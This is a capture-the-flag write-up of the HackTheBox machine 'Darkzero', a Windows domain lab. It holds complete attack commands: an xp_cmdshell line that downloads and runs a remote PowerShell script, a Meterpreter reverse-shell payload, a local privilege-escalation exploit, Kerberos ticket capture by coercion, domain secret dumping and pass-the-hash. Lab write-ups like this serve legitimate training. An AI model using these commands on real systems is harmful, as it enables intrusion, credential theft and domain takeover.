# Introduction
Darkzero is a HackTheBox machine that involves exploiting a Microsoft SQL Server (MSSQL) instance to gain initial access, escalating privileges through various techniques including Kerberos ticket abuse, and ultimately achieving root access. The machine features a domain environment with two domain controllers (DC01 and DC02), requiring lateral movement and exploitation of Windows vulnerabilities.
Machine Details:
- **OS:** Windows Server
- **Difficulty:** Hard
- **IP:** 10.10.11.89
- **Technologies:** MSSQL, Kerberos, SMB, PowerShell
# Enumeration
# Nmap Scan
Initial nmap scan revealed an open MSSQL service on port 1433.
nmap -sV -p- 10.10.11.89 |
Results showed:
- Port 1433/tcp open: ms-sql-s Microsoft SQL Server
# MSSQL Enumeration
Connected to the MSSQL server using impacket-mssqlclient with discovered credentials:
impacket-mssqlclient -windows-auth 'Darkzero.htb/john.w:RFulUtONCOL!@10.10.11.89' |
Enumerated databases, permissions, and configurations:
- Listed databases using `SELECT name FROM sys.databases;`: master, tempdb, model, msdb
- Checked permissions: Only CONNECT SQL and VIEW ANY DATABASE
- Identified trustworthy database: msdb (`SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1;`)
Attempted privilege escalation via trustworthy msdb:
- Tried creating stored procedures and jobs, but permissions were denied
- Enumerated tables and procedures in msdb, but access to sensitive tables like sysproxies was denied
- Attempted file reading with OPENROWSET, but bulk load permissions were denied
# Initial Access
# Remote Code Execution via xp_cmdshell
Despite restrictions, xp_cmdshell was available. Used it to download and execute a PowerShell script for RCE:
EXEC('xp_cmdshell ''powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''''http://10.10.14.130:8080/exp.ps1'''')"''') AT [DC02.darkzero.ext]; |
This provided a shell on DC02 with limited privileges.
# Privilege Escalation
# Stabilizing Shell and Switching to Meterpreter
- Created a Meterpreter payload and listener:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.130 LPORT=4444 -f exe -o exp.exe |
- In Metasploit:
use exploit/multi/handler |
- Ran local exploit suggester, which identified CVE-2024-30088 (authz_basep) as applicable
- Exploited the vulnerability:
use exploit/windows/local/cve_2024_30088_authz_basep |
This escalated privileges to SYSTEM on DC02.
# User Flag
Located user.txt on DC02:
type C:\Users\Administrator\Desktop\user.txt |
Flag: <
# Post-Exploitation and Lateral Movement
# Kerberos Ticket Capture with Rubeus
- Uploaded Rubeus.exe to DC02 and ran in monitor mode:
C:\Windows\Temp\Rubeus.exe monitor /interval:1 /nowrap |
- Triggered Kerberos authentication by attempting SMB access from MSSQL on DC01:
EXEC xp_dirtree '\\DC02.darkzero.ext\sfsdafasd', 1, 10; |
This caused DC01$ to request a Kerberos ticket, which Rubeus captured.
# Ticket Conversion and Domain Dumping
- Saved the base64 ticket output to ticket.bs4.kirbi
- Decoded and converted to ccache:
cat ticket.bs4.kirbi | base64 -d > ticket.kirbi |
- Used the ticket to dump domain secrets:
impacket-secretsdump -k -no-pass 'darkzero.htb/DC01$@DC01.darkzero.htb' |
# Root Access
# Administrator Access on DC01
Used the obtained NTLM hash for evil-winrm:
evil-winrm -i 10.10.11.89 -u Administrator -H <NTLM_hash> |
Located root.txt:
type C:\Users\Administrator\Desktop\root.txt |
# Conclusion
This machine demonstrated advanced Windows domain exploitation techniques:
- MSSQL enumeration and RCE via xp_cmdshell
- Local privilege escalation using recent CVEs
- Kerberos ticket abuse for lateral movement
- Domain credential dumping and pass-the-hash
Key takeaways:
- Trustworthy databases can be misconfigurations leading to privilege escalation
- Rubeus is powerful for Kerberos ticket manipulation
- Combining SQL injection-like techniques with Windows authentication flows
Flags:
- User: "<
>>" - Root: "<
>"
-
# Tools Used
- nmap
- impacket-mssqlclient
- Metasploit Framework
- Rubeus
- ticketConverter.py
- impacket-secretsdump
- evil-winrm by Mrx0rd
